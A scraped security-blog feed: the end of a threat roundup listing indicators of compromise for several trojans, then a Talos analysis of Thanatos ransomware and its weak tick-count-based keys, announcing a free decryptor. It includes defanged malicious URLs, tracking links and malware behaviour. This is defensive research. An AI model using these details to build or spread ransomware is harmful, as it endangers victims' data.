<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS

Mutexes

IP Addresses

Domain Names

roster.su
etot.su

Files and or directories created

%LocalAppData%\Temp\tmpb550dbcc.bat
%AppData%\Ikywz
%AppData%\Ikywz\opmaf.exe
%AppData%\Meen
%AppData%\Meen\moibq.aqy
%AppData%\Zulie
%AppData%\Zulie\ylhib.ecf
%AppData%\Ikywz\opmaf.exe
%LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat
\TEMP\tmpWfEKb5.exe
%LocalAppData%\Temp\tmpb550dbcc.bat
%AppData%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\Preferred
%AppData%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\faf08ed1-edb0-448c-809a-73cb275c3833

File Hashes

153f450b211047e543b1ccce8ef6afe41a476aeccfd961cd0159d24e1096f77f
20d24c1936867db7511ec35003079dfd0bd6fa91f4bc0b34485c7f3a5adf31b4
71361e9c9a716ad6b6e0cc13e35b1f3ac0e39aa1eb33d445b87add909fb6e665
b9163c8a5974b8b9397fc2af2fa692cbf6a9e332bf2fc5cc7cfe4ef256ec3bc6
bb463702eb24d0d43d4510366ef05dc0cc5d6c001db2d80b7da59ce27d0f096c
bfe8551016d5e77bc71774f3a1bb7b194ed0817ae11155347c8b3ec8f8f9578d
d2c7a02492ab09e846a8dac12ab7bb7d742f0052071ab194cb6f838c68b14381
df65bd267142c58835136c519d40eb4b529b735e4d0ee7baa7aee00e62d17f00
e1de7ded32c7deabba387fd5ccf09d62c8fbd13b18a6bf1c8fa17d6746688c84
f675c120ed096112a120ec9b4a72dd589f5fed33d280b851c71d1c9657397a5f
f9dd63a23f4cf30db953e13d2a9f66fa6db69ac59b432f3a7abe9b6d9a955631
fb48a9b9da0d772521f925d3f578930cbd078e438d8c0a796a1112f1f96db659

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.Generic-6584512-1

Indicators of Compromise

Registry Keys

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
<HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\IndexTable
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D6
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D6
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D6
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB6\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\8000000005683

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\A00000000572A

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\GENRALNLA
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS

Mutexes

PEM1A4
PEM938
PEMB6C
PEM570
PEM6D0
PEM53C
PEMB18

IP Addresses

192.168.1.1
255.255.255.255
192.168.1.255
70.182.77.184
69.17.170.58
209.85.144.108
68.1.17.8
209.85.144.16
62.254.26.220
82.57.200.135
193.252.22.86
194.60.217.89
74.124.44.100
195.200.78.68
64.8.71.14
108.167.146.22
193.252.22.84
208.91.199.223
64.210.232.50
192.185.4.48
217.79.186.14
66.147.240.163
64.98.36.162
69.168.97.48
62.254.26.231
62.24.139.43
216.40.42.154
40.97.188.226
184.154.202.50
143.95.253.117
198.89.124.197
158.69.57.254
192.185.4.148
69.163.253.7
74.208.196.99
212.1.215.225
195.229.241.221
69.89.31.229
54.169.79.115
93.17.128.164
50.87.144.90
64.136.52.50
144.217.66.117
69.168.97.78
62.24.202.43
52.71.59.20
64.4.202.62

Domain Names

smtp.orange.fr
smtp.googlemail.com
smtp.crosbyisd.org
smtp.robeson.k12.nc.us
smtp.fuse.net
smtp.tim.it
smtp.cox.net
smtp.blueyonder.co.uk
mail.vd.educanet2.ch
smtp.gmail.com
mail.wanadoo.fr
gator4037.hostgator.com
bbm-exchange.bbm-germany.de
mail.cmidwest.com
mail.banit.club
mail.sfr.fr
smtp.netzero.com
mail.telebeep.com
smtp.tiscali.co.uk
mail.virgin.net
s4.fcomet.com
smtp.gtscarrier.com
smtp.charter-business.net
mail.cecompute.com
smtp.hughes.net
smtp.rcn.com
mail.dbmcbride.com
smtp.talktalk.net
smtp.whitecars.com
gator4136.hostgator.com
mail.niuelec.com.pg
mail.rjcables.com
gator3071.hostgator.com
mail.fuse.net
smtp.wanadoo.fr
smtp.exchange.1and1.com
smtp.orthopaedicsopenjournal.com
mail.tropitelvalley.com
smtp.exchange.emailservice.io
box429.bluehost.com
mail.cmail.club
mail.xplornet.ca
mail.labolab.com.ec
smtp.nhspeedometer.com
smtp.emirates.net.ae

Files and or directories created

\srvsvc
%WinDir%\AppCompat\Programs\RecentFileCache.bcf
%System32%\config\SYSTEM
%System32%\config\SYSTEM.LOG1
%WinDir%\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
%WinDir%\SysWOW64\wrGwEEi.exe
%WinDir%\SysWOW64\wrGwEEi.exe

File Hashes

07fd0e423c2272c76323d8b816f83ff4e4715fa97d22ef331131bd4ac5b084b4
114d916fdfc70a518790f184311ff5ef3488b4181366e782b37c0d68fdfd2f1e
482be1caf6a2a0b959a4a40460c007f88615ab787b8771474f9c6fc5cf5acf66
4ac3cc415b1b3847b69ec0e7fb4287dce886fe17631a4f5a9f0f400118aa972a
5ad9c2866e77495fe2d41c5067879bb938716fe00e4a8dbcfaa7b90a8b53655e
5f12c45ebd24669b0e69e63c549c6812d742220c5221bb147c6312f1a68ac5dc
6a3d06d6bbe7b98f604cc9167b7a96c94b8fb7f749f893038926f552b56c8931
7335842c08c2f8caecf1754ca5d5ee75d9a4cdaae05d70792dd4be56127de424
7f198deac8ecf78fc1658728669c1523176a65d71e95605b28991b09a40a6259
8387856244d53a3025f8eafbe1cd2bbfcf0c40c6a04f70de1d0e22d29261de96
86d9d667ba5d0880ada452dbac0b6dec35c30248398d14f984143ce7738e61fa
969e2c1803df2eda353feb8381687922d28d58bc2910feabc894842d4d9a388f
9c5e793117db00555164da86a4c4f075b24abef08b313bc192bb80a9f55f4e69
9fbbcd37da800026d3dcd10d2e3cd622447ff0d91c65c6ddf4a232dee2b6f054
cc0208db49b171a19a6309301e78a0619bf3122887da1d28ea29ee0e84717026
dad9965c05194ec329b240eec4e975269c2f4bc2a3fdda057872991c541ef7f8
e7f818214208a01677a70b60b598703ab4c4408b1a495172e25934a7ae11c84b

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Installcore-6584374-1

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
<HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION

<HKCU>\Software\Microsoft\Internet Explorer\Main

Mutexes

!IECompat!Mutex

IP Addresses

35.163.153.35
52.206.6.222
52.42.47.197
34.218.108.244

Domain Names

rp.totikik1.com
os.totikik1.com
os2.totikik1.com

Files and or directories created

%LocalAppData%\Temp\in699DB22B\
%LocalAppData%\Temp\in699DB22B\2A4213C8.tmp
%LocalAppData%\Temp\INH265~1\css\
%LocalAppData%\Temp\INH265~1\css\ie6_main.css
%LocalAppData%\Temp\INH265~1\css\main.css
%LocalAppData%\Temp\INH265~1\css\sdk-ui\
%LocalAppData%\Temp\INH265~1\css\sdk-ui\browse.css
%LocalAppData%\Temp\INH265~1\css\sdk-ui\button.css
%LocalAppData%\Temp\INH265~1\css\sdk-ui\checkbox.css
%LocalAppData%\Temp\INH265~1\css\sdk-ui\images\
%LocalAppData%\Temp\INH265~1\css\sdk-ui\images\button-bg.png
%LocalAppData%\Temp\INH265~1\css\sdk-ui\images\progress-bg-corner.png
%LocalAppData%\Temp\INH265~1\css\sdk-ui\images\progress-bg.png
%LocalAppData%\Temp\INH265~1\css\sdk-ui\images\progress-bg2.png
%LocalAppData%\Temp\INH265~1\css\sdk-ui\progress-bar.css
%LocalAppData%\Temp\INH265~1\csshover3.htc
%LocalAppData%\Temp\INH265~1\form.bmp.Mask
%LocalAppData%\Temp\INH265~1\images\
%LocalAppData%\Temp\INH265~1\images\BG.png
%LocalAppData%\Temp\INH265~1\images\Close.png
%LocalAppData%\Temp\INH265~1\images\Close_Hover.png
%LocalAppData%\Temp\INH265~1\images\Color_Button.png
%LocalAppData%\Temp\INH265~1\images\Grey_Button.png
%LocalAppData%\Temp\INH265~1\images\Grey_Button_Hover.png
%LocalAppData%\Temp\INH265~1\images\Loader.gif
%LocalAppData%\Temp\INH265~1\images\Progress.png
%LocalAppData%\Temp\INH265~1\images\ProgressBar.png
%LocalAppData%\Temp\INH265~1\images\sponsored.png
%LocalAppData%\Temp\INH265~1\locale\
%LocalAppData%\Temp\INH265~1\locale\EN.locale
%LocalAppData%\Temp\INH265~1\images\Color_Button_Hover.png
%LocalAppData%\Temp\9E6FFDFF.log
%LocalAppData%\Temp\9E7000AD.log
%LocalAppData%\Temp\9E7000BD.log
%LocalAppData%\Temp\inH265813966324383\
%LocalAppData%\Temp\inH265813966324383\bootstrap_5001.html
%ProgramFiles% (x86)\9E7009E1.log

File Hashes

00f5fb9fcc5740a8538141cd5faba3ff4c326558c62e5e95da316129785673c5
012a09533536cc77bf0eaed8ab3acefae793bdd35223ce5391710c70ddffe393
0135775f4298ddb7b44b2bb40c869c8ad78ba874203e151634eb2c71506c7332
0546adad07a2169c980d9965bc94ed94b9fce9b2f310ae1be8c6df3ba8c0a177
09d060282484fb0eed75a2f7e5970699b002c42ebddd5b0017911b01706f4646
09d603e99ccec947facb2b2da48bd5c7da44c622da2c97344fa89ed39dd65812
0a1c695bef83997a684e845b9179c9e229e4ca479e92e81b2e006dac6f559fe9
0a52f81e4d9c244880353df9b641c88f4649ced7df1a820c1bcc5a9722189a0b
0c07cb171aa5978cd5eeeecd22ed32b83e253926f82a439f2be076248894b1d9
0c97012e37ef8f55af1b9926c065c9c08bc32224718f2bbd6f3a3e971f6075d7
0e4ee2f6bddd019745bfca57bd47260ba52e0c8bc42013036b05d89fc643592a
0ec5f5d88faf0ed99235adf55c0f97870512a10144d97d8b32658bf718d4bca8
0fb590428e8b12d48d74e7744bb00aaa88c9079deadc8f5e61aec1145e67e0c1
1357c5fa8e01e446f4ec0065e7400b5810ee53115735f09e97a3af413b6d8de9
14018597d0f8231df086e21e0d8660b4ad94aeda5fefd3749604039731d50f55
14416c9bf4c7b938377b528cddd359509ce3c09a57b12a756451432f96e3e8a9
15d4ce867af59a0f95c4acd35c4abd4e0d8fe199a7a32fae5480c68669aa2469
17bde73dc4ee1fd1999d6efe7519a25bbfc61fe53c705665a2451b26367826b4
1806d1dc9deebea348c03f731696c0191f7ddf74b7c3af512df96e9c86dade47
185b0a621bd278df79a77eddecfe9908e8032b9e19d5db930ef5cfa56b766a45
1b6f5acaa8737285ab91f7ca5d80dff908aee706254c1aad1eabb8f310f78649
1cd10e184752c9eb4bc7c1d3301bc80f5d56b25c294d66945e4ae86653aa87a8
1e6bb4ed50b658e0bdd74fdfbb7897f847d83be01292b19fc29d4ebcc52557b6
200de4855c7523956ccbd08585b6102cec28ddc0710a6a1e11885b7b73b1d541
20ba5231bc9b84ce5640aca571ca65f76b0d1e2e5ff07250057c2757b3d58262

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.Jaik-6584366-1

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
<HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\1000000008F79

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB6
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D6
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB6\Indexes

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB6\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB6\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}

<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\33fd244257221b4aa4a1d9e6cacf8474
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4c8f4917d8ab2943a2b2d4227b0585bf
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5309edc19dc6c14cbad5ba06bdbdabd9
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\82fa2a40d311b5469a626349c16ce09b
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9e71065376ee7f459f30ea2534981b83
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a88f7dcf2e30234e8288283d75a65efb
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\d33fc3b19a738142b2fc0c56bd56ad8c
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ecd15244c3e90a4fbd0588a41ab27c55
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Mutexes

8-3503835SZBFHHZ
O247ST8-UYZ6KDCz

IP Addresses

34.202.122.77
199.34.228.159
188.93.150.105
199.193.6.130
79.98.129.62
198.185.159.145
156.67.212.57
94.73.146.154

Domain Names

www.acilklimaservisi.net
www.mediquipmedicalsolutions.net
www.thisforthatquidproquo.com
www.verim.site
www.nextdealworld.com
www.pelatihanukm.com
www.maydiamondbeautyandstyle.com
www.mirrorxr.com
www.nuuee.com
www.walktofinancialfreedom.com
www.epsycoachez.com

Files and or directories created

\PC*\MAILSLOT\NET\NETLOGON
%AllUsersProfile%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol
%LocalAppData%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol
%AppData%\O247ST8-
%AppData%\O247ST8-\O24log.ini
%AppData%\O247ST8-\O24logim.jpeg
%AppData%\O247ST8-\O24logrv.ini
%ProgramFiles% (x86)\L0xbx
%ProgramFiles% (x86)\L0xbx\winztqlgh18.exe
%LocalAppData%\Temp\L0xbx
%LocalAppData%\Temp\L0xbx\winztqlgh18.exe
\TEMP\tmptxf6QC.exe

File Hashes

4145362d249b81cd7f7caca054693ef5621a1f820101b4bff27009c896157e75
5270a58badc5af1c4eb47e8100958699dcb4ef137670da52e24d23f1d687caac
5dda41fb0abc6528d80995aedb47c0b59fc6467e7307bbdc75d097aef50fcd21
71f19b06d95ec1e2947c012008bda50e23fca9a8707ccef53f2b3d4c496d179e
7985460fa754edcbc2e3aa499d0dacf771a60d8a2c53e05113faeccae1496542
a28fabc26c7bf6da4e8a7ae712c89fa173de94787aa612a245a1452a8fb4d497
c2d7be6d4ab0d11a3cae4872db6fd104f1cdfcf6516e3b3548297e3b86795bf9
da56e0abc288d01462844de42eeac4c7a14f76f09028ffb2d55909beace24504
eafe26e115ca9bf982d3b579f7970e3ffa4307b9e9ab5794dd14f192941360c6
ed5478099263686e19bf1fc7f5c169f84afb05ecc44008e3056d913e20edc6a6

Coverage

Screenshots of Detection

AMP

ThreatGrid

↧

Files Cannot Be Decrypted? Challenge Accepted. Talos Releases ThanatosDecryptor

June 26, 2018, 8:00 am

≫ Next: Beers with Talos EP 32 - Live from Orlando Part 2: Take All the Things Off the Internet

≪ Previous: Threat Roundup for June 16-22

This blog post was authored by Edmund Brumaghin, Earl Carter and Andrew Williams.

Executive summary

Cisco Talos has analyzed Thanatos, a ransomware variant that is being distributed via multiple malware campaigns that have been conducted over the past few months. As a result of our research, we have released a new, free decryption tool to help victims recover from this malware. Multiple versions of Thanatos have been leveraged by attackers, indicating that this is an evolving threat that continues to be actively developed by threat actors with multiple versions having been distributed in the wild. Unlike other ransomware commonly being distributed, Thanatos does not demand ransom payments to be made using a single cryptocurrency like bitcoin. Instead, it has been observed supporting ransom payments in the form of Bitcoin Cash (BCH), Zcash (ZEC), Ethereum (ETH) and others.

Additionally, due to issues present within the encryption process leveraged by this ransomware, the malware authors are unable to return the data to the victim, even if he or she pays the ransom. While previous reports seem to indicate this is accidental, specific campaigns appear to demonstrate that in some cases, this is intentional on the part of the distributor. In response to this threat, Talos is releasing ThanatosDecryptor, a free decryption tool that exploits weaknesses in the design of the file encryption methodology used by Thanatos. This utility can be used by victims to regain access to their data if infected by this ransomware.

Technical details

Ongoing evolution of Thanatos

While tracking and analyzing the various campaigns being used to distribute the Thanatos ransomware, Talos identified multiple distinct versions of this malware, indicating that it is continuing to be actively developed by the malware author. The main differences can be directly observed within the ransom note being used to inform victims that they have been infected and provide instructions for paying a ransom to the attacker. Version 1 of Thanatos, which was being distributed in mid-February of this year, featured a very primitive ransom note that is stored on the victim's desktop as README.txt.

In this version of Thanatos, the ransom note simply informs the user that their files have been encrypted and instructs them to pay a ransom amount of 0.01 bitcoin (BTC) to the specified bitcoin wallet. Rather than using different wallet addresses across samples, the same hardcoded wallet address is present in all samples of this version of Thanatos that Talos analyzed. Payment processing appears to be manual and email-based, which is indicative of an attacker with limited resources and knowledge of ransomware creation and distribution techniques used by other more well-known ransomware families such as Locky, Cerber, etc.

Shortly after Version 1 was observed being distributed, malware distribution campaigns began distributing Thanatos Version 1.1 with the majority of the distribution of Version 1.1 occurring between February and April 2018. This updated version of Thanatos featured several key differences related to the type of cryptocurrencies that victims could pay with.

As can be seen in the screenshot of the ransom note above, Thanatos Version 1.1 supports payment of the ransom demand using BTC, ETH, and BCH. Additionally, the malware also now includes a unique MachineID that the victim is instructed to send to the attacker via email.

Interestingly, the ransom notes changed several times across samples that Talos analyzed. Below is another example of one of the ransom notes used by this malware. Note that the attacker had changed the email address being used to communicate with victims. The attacker was also purporting to process ransom payments in the form of Zcash versus the other cryptocurrencies listed in the other ransom notes.

In investigating the distribution mechanisms being used by the attacker to infect victims and remove their ability to access data on their system, we identified an interesting campaign that indicated that at least in this particular case, the attacker had no intention of providing any sort of data decryption to the victim. The malware appears to have been delivered to the victim as an attachment to a chat message sent to the victim using the Discord chat platform. Discord is a voice and text chatting platform that allows direct communications between two or more participants. The URL hosting the attached malware is below:

hxxps://cdn[.]discordapp[.]com/attachments/230687913581477889/424941165339475968/fastleafdecay.exe

The filename used in this case was "fastleafdecay.exe" which may indicate that the victim was tricked into executing the malware as it was posing as a mod of the same name in the video game Minecraft. When executed, this sample displayed the following ransom note to victims:

As can be seen in the above screenshot, the malware author did not include any instructions for paying a ransom, instead stating that decryption was not available, indicating that this particular case was not financially motivated, and instead was used to destroy data on the victim's system. Interestingly, the PDB path that was intact on this sample differed from the other samples that Talos analyzed. In this case, the PDB path was:

C:\Users\Artur\Desktop\csharp - js\косте пизда\Release\Thanatos.pdb

Most of the other samples contained the following PDB path:

D:\Work\Thanatos\Release\Thanatos.pdb

Talos also observed a sample that had been compiled in debug mode that contained the following PDB path:

D:\Работа\Локер шифровчик\Thanatos-master\Debug\Thanatos.pdb

Thanatos operations and encryption process

When executed on victim systems, Thanatos copies itself into a subdirectory that it creates within %APPDATA%/Roaming. The subdirectory name and executable file name are randomly generated based on system uptime and changes each time the malware executes.

Thanatos recursively scans the following directories within the current user's profile to identify files to encrypt:

Desktop
Documents
Downloads
Favourites
Music
OneDrive
Pictures
Videos

While many ransomware families have a specific list of file extensions that are supported for encryption, Thanatos supports encryption of any file that has an extension. For each file that the malware locates, it derives an encryption key based on the number of milliseconds that the infected system has been running via a call to GetTickCount. The malware then encrypts the file using Advanced Encryption Standard (AES)-256 and discards the encryption key. The process of discarding the encryption key precludes the attacker from being able to provide access to the decrypted data, even if a ransom demand is paid. Encrypted files are then written to the filesystem with the .THANATOS file extension and the original files are deleted.

The malware also leverages an external website called iplogger. This website provides customized URLs that can be used to track information about systems that access the URL. By making HTTP GET requests using these hardcoded URLs, the attacker can obtain information about all of the different systems that have been infected with Thanatos.

The HTTP GET request are all made using the following user agent:

Mozilla/5.0 (Windows NT 6.1) Thanatos/1.1

Talos has observed the following iplogger URLs hardcoded into various Thanatos samples that were analyzed:

hxxp://iplogger[.]com:80/1CUTM6

hxxp://iplogger[.]com:80/1t3i37

The ransom note associated with Thanatos is saved to the infected user's desktop using the filename README.txt. A registry entry is created so that each time the system boots, the ransom note is displayed using the Notepad application. This registry key is located in:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Aside from this, the malware does not obtain persistence for the executable itself.

ThanatosDecryptor

As previously described, the encryption keys used to encrypt files on victims' systems are derived based upon the number of milliseconds since the system last booted. This value is a 32-bit number, meaning that the encryption key is effectively 32 bits as well. Additionally, the maximum number of milliseconds that can be stored in a 32-bit value is roughly 49.7 days' worth, which is higher than the average amount of uptime on many systems due to patch installation, system reboots, and other factors. This makes brute-forcing the key values significantly cheaper from a time perspective.

Another optimization can be made based on the fact that the system uptime is written to the Windows Event Log roughly once per day. Since Thanatos does not modify the file creation dates on encrypted files, the key search space can be further reduced to approximately the number of milliseconds within the 24-hour period leading up to the infection. At an average of 100,000 brute-force attempts per second (which was the baseline in a virtual machine used for testing), it would take roughly 14 minutes to successfully recover the encryption key in these conditions.

Talos is releasing a decryption utility that can be leveraged by victims of Thanatos to attempt to regain access to data and files stored on the infected system. It has been tested on Versions 1 and 1.1 of the Thanatos ransomware and on all currently known Thanatos samples Talos has observed.

Note: In order to decrypt files as quickly as possible, ThanatosDecryptor should be executed on the original machine that was infected and against the original encrypted files that the malware created.

This decryption utility currently supports decryption of the following types of files:

Image: .gif, .tif, .tiff, .jpg, .jpeg, .png
Video: .mpg, .mpeg, .mp4, .avi
Audio: .wav
Document: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .odt, .ods, .odp, .rtf
Other: .zip, .7z, .vmdk, .psd, .lnk

The decryptor first searches the same directories as the ransomware to identify files that contain the .THANATOS file extension. For files that contain the .THANATOS file extension, the decryptor will then obtain the original file extension, which is left intact during infection, and compare it to the list of supported file types. If the file type is supported, the decryptor will then queue that file for decryption.

ThanatosDecryptor also parses the Windows Event Log for uptime messages and uses the encrypted file creation time metadata to determine a starting value for decryption. This value is used to derive an encryption key, and an AES decryption operation is performed against the file contents. The resulting bytes are then compared against values known to be valid file headers for the specific file type. If they do not match, meaning the decryption process was unsuccessful, the seed value for the encryption key is then incremented, and the process is repeated. Once successful, the original file is written to the file system, and the original filename is restored. Once one file has been successfully decrypted, ThanatosDecryptor uses the seed value from that decryption attempt as the starting point for decryption attempts against additional files since they are likely to be very similar.

To execute ThanatosDecryptor, simply download the ThanatosDecryptor project here and execute ThanatosDecryptor.exe, which can be found in the release directory. Additional information and example output can be obtained here.

Following the money … or lack thereof

